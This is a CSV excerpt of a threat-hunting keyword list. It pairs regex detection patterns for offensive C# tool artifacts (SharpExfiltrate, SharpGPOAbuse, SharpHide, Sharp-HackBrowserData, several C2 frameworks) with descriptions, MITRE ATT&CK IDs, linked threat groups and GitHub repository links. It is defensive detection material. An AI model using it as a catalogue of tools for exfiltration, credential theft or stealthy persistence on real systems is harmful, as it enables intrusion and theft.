"*SharpExfiltrate.csproj*",".{0,1000}SharpExfiltrate\.csproj.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58972"
"*SharpExfiltrate.exe*",".{0,1000}SharpExfiltrate\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58973"
"*SharpExfiltrate.sln*",".{0,1000}SharpExfiltrate\.sln.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58974"
"*SharpExfiltrateLootCache*",".{0,1000}SharpExfiltrateLootCache.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58975"
"*SharpExfiltrate-main*",".{0,1000}SharpExfiltrate\-main.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58976"
"*sharp-fexec *",".{0,1000}sharp\-fexec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58977"
"*SharpFtpC2*",".{0,1000}SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","58978"
"*SharpGen.dll*",".{0,1000}SharpGen\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58979"
"*sharpgen.enable_cache*",".{0,1000}sharpgen\.enable_cache.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58980"
"*sharpgen.py*",".{0,1000}sharpgen\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58981"
"*sharpgen.set_location*",".{0,1000}sharpgen\.set_location.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58982"
"*SharpGhost.exe*",".{0,1000}SharpGhost\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58983"
"*SharpGhosting.exe*",".{0,1000}SharpGhosting\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58984"
"*SharpGhostTask.csproj*",".{0,1000}SharpGhostTask\.csproj.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","58985"
"*SharpGhostTask.exe*",".{0,1000}SharpGhostTask\.exe.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","58986"
"*SharpGhostTask.sln*",".{0,1000}SharpGhostTask\.sln.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","58987"
"*SharpGmailC2-main*",".{0,1000}SharpGmailC2\-main.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","58988"
"*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","58989"
"*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","58990"
"*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58991"
"*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58992"
"*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58993"
"*SharpGPOAddComputer*",".{0,1000}SharpGPOAddComputer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58994"
"*SharpGPOAddLocalAdmin*",".{0,1000}SharpGPOAddLocalAdmin.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58995"
"*SharpGPOAddUser*Manager*",".{0,1000}SharpGPOAddUser.{0,1000}Manager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58996"
"*SharpGraph.exe Get-UserChatMessages -id *",".{0,1000}SharpGraph\.exe\sGet\-UserChatMessages\s\-id\s.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","58997"
"*SharpGraph.exe List-ChatMessages *",".{0,1000}SharpGraph\.exe\sList\-ChatMessages\s.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","58998"
"*SharpGraphView.exe*",".{0,1000}SharpGraphView\.exe.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","1","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","58999"
"*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","59000"
"*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","59001"
"*SharpHandler.exe*",".{0,1000}SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59002"
"*SharpHide running as elevated user*",".{0,1000}SharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59003"
"*SharpHide.csproj*",".{0,1000}SharpHide\.csproj.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59004"
"*SharpHide.exe*",".{0,1000}SharpHide\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59005"
"*SharpHide.sln*",".{0,1000}SharpHide\.sln.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59006"
"*SharpHide-master*",".{0,1000}SharpHide\-master.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59007"
"*SharpHide-N*.exe*",".{0,1000}SharpHide\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59008"
"*SharpHose.exe*",".{0,1000}SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59009"
"*sharphound -*",".{0,1000}sharphound\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59010"
